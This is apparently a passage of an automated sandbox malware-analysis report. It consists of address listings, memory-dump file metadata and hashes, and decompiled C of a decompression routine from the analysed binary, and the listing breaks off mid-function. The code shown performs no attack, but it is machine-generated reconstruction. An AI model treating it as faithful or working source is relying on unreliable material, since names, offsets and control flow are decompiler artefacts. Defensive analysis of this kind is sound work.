                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040605a
                                                                                                                0x0040605a
                                                                                                                0x0040605d
                                                                                                                0x0040605d
                                                                                                                0x0040605e
                                                                                                                0x0040605e
                                                                                                                0x00000000
                                                                                                                0x0040605a
                                                                                                                0x00406030
                                                                                                                0x00406034
                                                                                                                0x00406039
                                                                                                                0x00406039
                                                                                                                0x00406042
                                                                                                                0x00406048
                                                                                                                0x0040604a
                                                                                                                0x0040604d
                                                                                                                0x00000000
                                                                                                                0x00406053
                                                                                                                0x00406053
                                                                                                                0x00000000
                                                                                                                0x00406053
                                                                                                                0x00000000
                                                                                                                0x00406070
                                                                                                                0x00406070
                                                                                                                0x00406074
                                                                                                                0x00406920
                                                                                                                0x00000000
                                                                                                                0x00406920
                                                                                                                0x0040607d
                                                                                                                0x0040608d
                                                                                                                0x00406090
                                                                                                                0x00406093
                                                                                                                0x00406093
                                                                                                                0x00406093
                                                                                                                0x00406096
                                                                                                                0x00406096
                                                                                                                0x0040609a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040609c
                                                                                                                0x0040609f
                                                                                                                0x004060a2
                                                                                                                0x004060cc
                                                                                                                0x004060d2
                                                                                                                0x004060d9
                                                                                                                0x00000000
                                                                                                                0x004060d9
                                                                                                                0x004060a4
                                                                                                                0x004060a8
                                                                                                                0x004060ab
                                                                                                                0x004060b0
                                                                                                                0x004060b0
                                                                                                                0x004060bb
                                                                                                                0x004060c1
                                                                                                                0x004060c3
                                                                                                                0x004060c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040610b
                                                                                                                0x00406111
                                                                                                                0x00406114
                                                                                                                0x00406121
                                                                                                                0x00406129
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004060e0
                                                                                                                0x004060e0
                                                                                                                0x004060e4
                                                                                                                0x0040692f
                                                                                                                0x00000000
                                                                                                                0x0040692f
                                                                                                                0x004060f0
                                                                                                                0x004060fb
                                                                                                                0x004060fb
                                                                                                                0x004060fb
                                                                                                                0x004060fe
                                                                                                                0x00406101
                                                                                                                0x00406104
                                                                                                                0x00406107
                                                                                                                0x00406109
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004067a0
                                                                                                                0x004067a0
                                                                                                                0x004067a6
                                                                                                                0x004067ac
                                                                                                                0x004067af
                                                                                                                0x004067b2
                                                                                                                0x004067cc
                                                                                                                0x004067cf
                                                                                                                0x004067d5
                                                                                                                0x004067e0
                                                                                                                0x004067e0
                                                                                                                0x004067e2
                                                                                                                0x004067b4
                                                                                                                0x004067b4
                                                                                                                0x004067c3
                                                                                                                0x004067c7
                                                                                                                0x004067c7
                                                                                                                0x004067e5
                                                                                                                0x004067ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004067ee
                                                                                                                0x004067ee
                                                                                                                0x004067f2
                                                                                                                0x004069a1
                                                                                                                0x00000000
                                                                                                                0x004069a1
                                                                                                                0x004067fe
                                                                                                                0x00406805
                                                                                                                0x0040680d
                                                                                                                0x0040680d
                                                                                                                0x0040680d
                                                                                                                0x00406810
                                                                                                                0x00406813
                                                                                                                0x00406813
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406131
                                                                                                                0x00406133
                                                                                                                0x00406136
                                                                                                                0x004061a7
                                                                                                                0x004061aa
                                                                                                                0x004061ad
                                                                                                                0x004061b4
                                                                                                                0x004061be
                                                                                                                0x00000000
                                                                                                                0x004061be
                                                                                                                0x00406138
                                                                                                                0x0040613c
                                                                                                                0x0040613f
                                                                                                                0x00406141
                                                                                                                0x00406144
                                                                                                                0x00406147
                                                                                                                0x00406149
                                                                                                                0x0040614c
                                                                                                                0x0040614e
                                                                                                                0x00406153
                                                                                                                0x00406156
                                                                                                                0x00406159
                                                                                                                0x0040615d
                                                                                                                0x00406164
                                                                                                                0x00406167
                                                                                                                0x0040616e
                                                                                                                0x00406172
                                                                                                                0x0040617a
                                                                                                                0x0040617a
                                                                                                                0x0040617a
                                                                                                                0x00406174
                                                                                                                0x00406174
                                                                                                                0x00406174
                                                                                                                0x00406169
                                                                                                                0x00406169
                                                                                                                0x00406169
                                                                                                                0x0040617e
                                                                                                                0x00406181
                                                                                                                0x0040619f
                                                                                                                0x004061a1
                                                                                                                0x00000000
                                                                                                                0x004061a1
                                                                                                                0x00406183
                                                                                                                0x00406186
                                                                                                                0x00406189
                                                                                                                0x0040618c
                                                                                                                0x0040618e
                                                                                                                0x0040618e
                                                                                                                0x0040618e
                                                                                                                0x00406191
                                                                                                                0x00406194
                                                                                                                0x00406196
                                                                                                                0x00406197
                                                                                                                0x0040619a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004063d0
                                                                                                                0x004063d4
                                                                                                                0x004063f2
                                                                                                                0x004063f5
                                                                                                                0x004063fc
                                                                                                                0x004063ff
                                                                                                                0x00406402
                                                                                                                0x00406405
                                                                                                                0x00406408
                                                                                                                0x0040640b
                                                                                                                0x0040640d
                                                                                                                0x00406414
                                                                                                                0x00406415
                                                                                                                0x00406417
                                                                                                                0x0040641a
                                                                                                                0x0040641d
                                                                                                                0x00406420
                                                                                                                0x00406420
                                                                                                                0x00406425
                                                                                                                0x00000000
                                                                                                                0x00406425
                                                                                                                0x004063d6
                                                                                                                0x004063d9
                                                                                                                0x004063dc
                                                                                                                0x004063e6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040643a
                                                                                                                0x0040643e
                                                                                                                0x00406461
                                                                                                                0x00406464
                                                                                                                0x00406467
                                                                                                                0x00406471
                                                                                                                0x00406440
                                                                                                                0x00406440
                                                                                                                0x00406443
                                                                                                                0x00406446
                                                                                                                0x00406449
                                                                                                                0x00406456
                                                                                                                0x00406459
                                                                                                                0x00406459
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040647d
                                                                                                                0x00406481
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406487
                                                                                                                0x0040648b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406491
                                                                                                                0x00406493
                                                                                                                0x00406497
                                                                                                                0x00406497
                                                                                                                0x0040649a
                                                                                                                0x0040649e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004064ee
                                                                                                                0x004064f2
                                                                                                                0x004064f9
                                                                                                                0x004064fc
                                                                                                                0x004064ff
                                                                                                                0x00406509
                                                                                                                0x00000000
                                                                                                                0x00406509
                                                                                                                0x004064f4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406515
                                                                                                                0x00406519
                                                                                                                0x00406520
                                                                                                                0x00406523
                                                                                                                0x00406526
                                                                                                                0x0040651b
                                                                                                                0x0040651b
                                                                                                                0x0040651b
                                                                                                                0x00406529
                                                                                                                0x0040652c
                                                                                                                0x0040652f
                                                                                                                0x0040652f
                                                                                                                0x00406532
                                                                                                                0x00406535
                                                                                                                0x00406538
                                                                                                                0x00406538
                                                                                                                0x0040653b
                                                                                                                0x00406542
                                                                                                                0x00406547
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004065d5
                                                                                                                0x004065d5
                                                                                                                0x004065d9
                                                                                                                0x00406977
                                                                                                                0x00000000
                                                                                                                0x00406977
                                                                                                                0x004065df
                                                                                                                0x004065e2
                                                                                                                0x004065e5
                                                                                                                0x004065e9
                                                                                                                0x004065ec
                                                                                                                0x004065f2
                                                                                                                0x004065f4
                                                                                                                0x004065f4
                                                                                                                0x004065f4
                                                                                                                0x004065f7
                                                                                                                0x004065fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004061ca
                                                                                                                0x004061ca
                                                                                                                0x004061ce
                                                                                                                0x0040693b
                                                                                                                0x00000000
                                                                                                                0x0040693b
                                                                                                                0x004061d4
                                                                                                                0x004061d7
                                                                                                                0x004061da
                                                                                                                0x004061de
                                                                                                                0x004061e1
                                                                                                                0x004061e7
                                                                                                                0x004061e9
                                                                                                                0x004061e9
                                                                                                                0x004061e9
                                                                                                                0x004061ec
                                                                                                                0x004061ef
                                                                                                                0x004061ef
                                                                                                                0x004061f2
                                                                                                                0x004061f5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004061fb
                                                                                                                0x00406201
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406207
                                                                                                                0x00406207
                                                                                                                0x0040620b
                                                                                                                0x0040620e
                                                                                                                0x00406211
                                                                                                                0x00406214
                                                                                                                0x00406217
                                                                                                                0x00406218
                                                                                                                0x0040621b
                                                                                                                0x0040621d
                                                                                                                0x00406223
                                                                                                                0x00406226
                                                                                                                0x00406229
                                                                                                                0x0040622c
                                                                                                                0x0040622f
                                                                                                                0x00406232
                                                                                                                0x00406235
                                                                                                                0x00406251
                                                                                                                0x00406254
                                                                                                                0x00406257
                                                                                                                0x0040625a
                                                                                                                0x00406261
                                                                                                                0x00406265
                                                                                                                0x00406267
                                                                                                                0x0040626b
                                                                                                                0x00406237
                                                                                                                0x00406237
                                                                                                                0x0040623b
                                                                                                                0x00406243
                                                                                                                0x00406248
                                                                                                                0x0040624a
                                                                                                                0x0040624c
                                                                                                                0x0040624c
                                                                                                                0x0040626e
                                                                                                                0x00406275
                                                                                                                0x00406278
                                                                                                                0x00000000
                                                                                                                0x0040627e
                                                                                                                0x00000000
                                                                                                                0x0040627e
                                                                                                                0x00000000
                                                                                                                0x00406283
                                                                                                                0x00406283
                                                                                                                0x00406287
                                                                                                                0x00406947
                                                                                                                0x00000000
                                                                                                                0x00406947
                                                                                                                0x0040628d
                                                                                                                0x00406290
                                                                                                                0x00406293
                                                                                                                0x00406297
                                                                                                                0x0040629a
                                                                                                                0x004062a0
                                                                                                                0x004062a2
                                                                                                                0x004062a2
                                                                                                                0x004062a2
                                                                                                                0x004062a5
                                                                                                                0x004062a8
                                                                                                                0x004062a8
                                                                                                                0x004062a8
                                                                                                                0x004062ae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004062b0
                                                                                                                0x004062b3
                                                                                                                0x004062b6
                                                                                                                0x004062b9
                                                                                                                0x004062bc
                                                                                                                0x004062bf
                                                                                                                0x004062c2
                                                                                                                0x004062c5
                                                                                                                0x004062c8
                                                                                                                0x004062cb
                                                                                                                0x004062ce
                                                                                                                0x004062e6
                                                                                                                0x004062e9
                                                                                                                0x004062ec
                                                                                                                0x004062ef
                                                                                                                0x004062ef
                                                                                                                0x004062f2
                                                                                                                0x004062f6
                                                                                                                0x004062f8
                                                                                                                0x004062d0
                                                                                                                0x004062d0
                                                                                                                0x004062d8
                                                                                                                0x004062dd
                                                                                                                0x004062df
                                                                                                                0x004062e1
                                                                                                                0x004062e1
                                                                                                                0x004062fb
                                                                                                                0x00406302
                                                                                                                0x00406305
                                                                                                                0x00000000
                                                                                                                0x00406307
                                                                                                                0x00000000
                                                                                                                0x00406307
                                                                                                                0x00406305
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406347
                                                                                                                0x00406347
                                                                                                                0x0040634b
                                                                                                                0x00406953
                                                                                                                0x00000000
                                                                                                                0x00406953
                                                                                                                0x00406351
                                                                                                                0x00406354
                                                                                                                0x00406357
                                                                                                                0x0040635b
                                                                                                                0x0040635e
                                                                                                                0x00406364
                                                                                                                0x00406366
                                                                                                                0x00406366
                                                                                                                0x00406366
                                                                                                                0x00406369
                                                                                                                0x0040636c
                                                                                                                0x0040636c
                                                                                                                0x00406372
                                                                                                                0x00406310
                                                                                                                0x00406310
                                                                                                                0x00406313
                                                                                                                0x00000000
                                                                                                                0x00406313
                                                                                                                0x00406374
                                                                                                                0x00406374
                                                                                                                0x00406377
                                                                                                                0x0040637a
                                                                                                                0x0040637d
                                                                                                                0x00406380
                                                                                                                0x00406383
                                                                                                                0x00406386
                                                                                                                0x00406389
                                                                                                                0x0040638c
                                                                                                                0x0040638f
                                                                                                                0x00406392
                                                                                                                0x004063aa
                                                                                                                0x004063ad
                                                                                                                0x004063b0
                                                                                                                0x004063b3
                                                                                                                0x004063b3
                                                                                                                0x004063b6
                                                                                                                0x004063ba
                                                                                                                0x004063bc
                                                                                                                0x00406394
                                                                                                                0x00406394
                                                                                                                0x0040639c
                                                                                                                0x004063a1
                                                                                                                0x004063a3
                                                                                                                0x004063a5
                                                                                                                0x004063a5
                                                                                                                0x004063bf
                                                                                                                0x004063c6
                                                                                                                0x004063c9
                                                                                                                0x00000000
                                                                                                                0x004063cb
                                                                                                                0x00000000
                                                                                                                0x004063cb
                                                                                                                0x00000000
                                                                                                                0x00406658
                                                                                                                0x00406658
                                                                                                                0x0040665c
                                                                                                                0x00406983
                                                                                                                0x00000000
                                                                                                                0x00406983
                                                                                                                0x00406662
                                                                                                                0x00406665
                                                                                                                0x00406668
                                                                                                                0x0040666c
                                                                                                                0x0040666f
                                                                                                                0x00406675
                                                                                                                0x00406677
                                                                                                                0x00406677
                                                                                                                0x00406677
                                                                                                                0x0040667a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406428
                                                                                                                0x00406428
                                                                                                                0x0040642b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406767
                                                                                                                0x0040676b
                                                                                                                0x0040678d
                                                                                                                0x00406790
                                                                                                                0x0040679a
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x0040676d
                                                                                                                0x00406770
                                                                                                                0x00406774
                                                                                                                0x00406777
                                                                                                                0x00406777
                                                                                                                0x0040677a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406824
                                                                                                                0x00406828
                                                                                                                0x00406846
                                                                                                                0x00406846
                                                                                                                0x00406846
                                                                                                                0x0040684d
                                                                                                                0x00406854
                                                                                                                0x0040685b
                                                                                                                0x0040685b
                                                                                                                0x00000000
                                                                                                                0x0040685b
                                                                                                                0x0040682a
                                                                                                                0x0040682d
                                                                                                                0x00406830
                                                                                                                0x00406833
                                                                                                                0x0040683a
                                                                                                                0x0040677e
                                                                                                                0x0040677e
                                                                                                                0x00406781
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406915
                                                                                                                0x00406918
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040654f
                                                                                                                0x00406551
                                                                                                                0x00406558
                                                                                                                0x00406559
                                                                                                                0x0040655b
                                                                                                                0x0040655e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406566
                                                                                                                0x00406569
                                                                                                                0x0040656c
                                                                                                                0x0040656e
                                                                                                                0x00406570
                                                                                                                0x00406570
                                                                                                                0x00406571
                                                                                                                0x00406574
                                                                                                                0x0040657b
                                                                                                                0x0040657e
                                                                                                                0x0040658c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406862
                                                                                                                0x00406862
                                                                                                                0x00406865
                                                                                                                0x0040686c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406871
                                                                                                                0x00406871
                                                                                                                0x00406875
                                                                                                                0x004069ad
                                                                                                                0x00000000
                                                                                                                0x004069ad
                                                                                                                0x0040687b
                                                                                                                0x0040687e
                                                                                                                0x00406881
                                                                                                                0x00406885
                                                                                                                0x00406888
                                                                                                                0x0040688e
                                                                                                                0x00406890
                                                                                                                0x00406890
                                                                                                                0x00406890
                                                                                                                0x00406893
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406899
                                                                                                                0x00406899
                                                                                                                0x0040689d
                                                                                                                0x004068fd
                                                                                                                0x00406900
                                                                                                                0x00406905
                                                                                                                0x00406906
                                                                                                                0x00406908
                                                                                                                0x0040690a
                                                                                                                0x0040690d
                                                                                                                0x00406819
                                                                                                                0x00406819
                                                                                                                0x00000000
                                                                                                                0x00406819
                                                                                                                0x0040689f
                                                                                                                0x004068a5
                                                                                                                0x004068a8
                                                                                                                0x004068ab
                                                                                                                0x004068ae
                                                                                                                0x004068b1
                                                                                                                0x004068b4
                                                                                                                0x004068b7
                                                                                                                0x004068ba
                                                                                                                0x004068bd
                                                                                                                0x004068c0
                                                                                                                0x004068d9
                                                                                                                0x004068dc
                                                                                                                0x004068df
                                                                                                                0x004068e2
                                                                                                                0x004068e6
                                                                                                                0x004068e8
                                                                                                                0x004068e8
                                                                                                                0x004068e9
                                                                                                                0x004068ec
                                                                                                                0x004068c2
                                                                                                                0x004068c2
                                                                                                                0x004068ca
                                                                                                                0x004068cf
                                                                                                                0x004068d1
                                                                                                                0x004068d4
                                                                                                                0x004068d4
                                                                                                                0x004068ef
                                                                                                                0x004068f6
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x00000000
                                                                                                                0x00406594
                                                                                                                0x00406597
                                                                                                                0x004065cd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x00406700
                                                                                                                0x00406700
                                                                                                                0x00406703
                                                                                                                0x00406705
                                                                                                                0x0040698f
                                                                                                                0x00000000
                                                                                                                0x0040698f
                                                                                                                0x0040670b
                                                                                                                0x0040670e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406714
                                                                                                                0x00406718
                                                                                                                0x0040671b
                                                                                                                0x0040671b
                                                                                                                0x0040671b
                                                                                                                0x00000000
                                                                                                                0x0040671b
                                                                                                                0x00406599
                                                                                                                0x0040659b
                                                                                                                0x0040659d
                                                                                                                0x0040659f
                                                                                                                0x004065a2
                                                                                                                0x004065a3
                                                                                                                0x004065a5
                                                                                                                0x004065a7
                                                                                                                0x004065aa
                                                                                                                0x004065ad
                                                                                                                0x004065c3
                                                                                                                0x004065c8
                                                                                                                0x00406600
                                                                                                                0x00406600
                                                                                                                0x00406604
                                                                                                                0x00406630
                                                                                                                0x00406632
                                                                                                                0x00406639
                                                                                                                0x0040663c
                                                                                                                0x0040663f
                                                                                                                0x0040663f
                                                                                                                0x00406644
                                                                                                                0x00406644
                                                                                                                0x00406646
                                                                                                                0x00406649
                                                                                                                0x00406650
                                                                                                                0x00406653
                                                                                                                0x00406680
                                                                                                                0x00406680
                                                                                                                0x00406683
                                                                                                                0x00406686
                                                                                                                0x004066fa
                                                                                                                0x004066fa
                                                                                                                0x004066fa
                                                                                                                0x00000000
                                                                                                                0x004066fa
                                                                                                                0x00406688
                                                                                                                0x0040668e
                                                                                                                0x00406691
                                                                                                                0x00406694
                                                                                                                0x00406697
                                                                                                                0x0040669a
                                                                                                                0x0040669d
                                                                                                                0x004066a0
                                                                                                                0x004066a3
                                                                                                                0x004066a6
                                                                                                                0x004066a9
                                                                                                                0x004066c2
                                                                                                                0x004066c4
                                                                                                                0x004066c7
                                                                                                                0x004066c8
                                                                                                                0x004066cb
                                                                                                                0x004066cd
                                                                                                                0x004066d0
                                                                                                                0x004066d2
                                                                                                                0x004066d4
                                                                                                                0x004066d7
                                                                                                                0x004066d9
                                                                                                                0x004066dc
                                                                                                                0x004066e0
                                                                                                                0x004066e2
                                                                                                                0x004066e2
                                                                                                                0x004066e3
                                                                                                                0x004066e6
                                                                                                                0x004066e9
                                                                                                                0x004066ab
                                                                                                                0x004066ab
                                                                                                                0x004066b3
                                                                                                                0x004066b8
                                                                                                                0x004066ba
                                                                                                                0x004066bd
                                                                                                                0x004066bd
                                                                                                                0x004066ec
                                                                                                                0x004066f3
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x00000000
                                                                                                                0x004066f5
                                                                                                                0x00000000
                                                                                                                0x004066f5
                                                                                                                0x004066f3
                                                                                                                0x00406606
                                                                                                                0x00406609
                                                                                                                0x0040660b
                                                                                                                0x0040660e
                                                                                                                0x00406611
                                                                                                                0x00406614
                                                                                                                0x00406616
                                                                                                                0x00406619
                                                                                                                0x0040661c
                                                                                                                0x0040661c
                                                                                                                0x0040661f
                                                                                                                0x0040661f
                                                                                                                0x00406622
                                                                                                                0x00406629
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00406629
                                                                                                                0x004065af
                                                                                                                0x004065b2
                                                                                                                0x004065b4
                                                                                                                0x004065b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406316
                                                                                                                0x00406316
                                                                                                                0x0040631a
                                                                                                                0x0040695f
                                                                                                                0x00000000
                                                                                                                0x0040695f
                                                                                                                0x00406320
                                                                                                                0x00406323
                                                                                                                0x00406326
                                                                                                                0x00406329
                                                                                                                0x0040632c
                                                                                                                0x0040632f
                                                                                                                0x00406332
                                                                                                                0x00406334
                                                                                                                0x00406337
                                                                                                                0x0040633a
                                                                                                                0x0040633d
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004064a1
                                                                                                                0x004064a1
                                                                                                                0x004064a5
                                                                                                                0x0040696b
                                                                                                                0x00000000
                                                                                                                0x0040696b
                                                                                                                0x004064ab
                                                                                                                0x004064ae
                                                                                                                0x004064b1
                                                                                                                0x004064b4
                                                                                                                0x004064b6
                                                                                                                0x004064b6
                                                                                                                0x004064b6
                                                                                                                0x004064b9
                                                                                                                0x004064bc
                                                                                                                0x004064bf
                                                                                                                0x004064c2
                                                                                                                0x004064c5
                                                                                                                0x004064c8
                                                                                                                0x004064c9
                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064ce
                                                                                                                0x004064d1
                                                                                                                0x004064d4
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064da
                                                                                                                0x004064dc
                                                                                                                0x004064dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x00406722
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406728
                                                                                                                0x0040672b
                                                                                                                0x0040672e
                                                                                                                0x00406731
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406736
                                                                                                                0x00406739
                                                                                                                0x0040673c
                                                                                                                0x0040673f
                                                                                                                0x00406742
                                                                                                                0x00406745
                                                                                                                0x00406746
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x0040674b
                                                                                                                0x0040674e
                                                                                                                0x00406751
                                                                                                                0x00406754
                                                                                                                0x00406757
                                                                                                                0x0040675b
                                                                                                                0x0040675d
                                                                                                                0x00406760
                                                                                                                0x00000000
                                                                                                                0x00406762
                                                                                                                0x004064df
                                                                                                                0x004064df
                                                                                                                0x00000000
                                                                                                                0x004064df
                                                                                                                0x00406760
                                                                                                                0x00406995
                                                                                                                0x004069b7
                                                                                                                0x004069bd
                                                                                                                0x004069bf
                                                                                                                0x004069c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fc4
                                                                                                                0x004069cc
                                                                                                                0x004069cc
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                                • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                                                • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                                • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
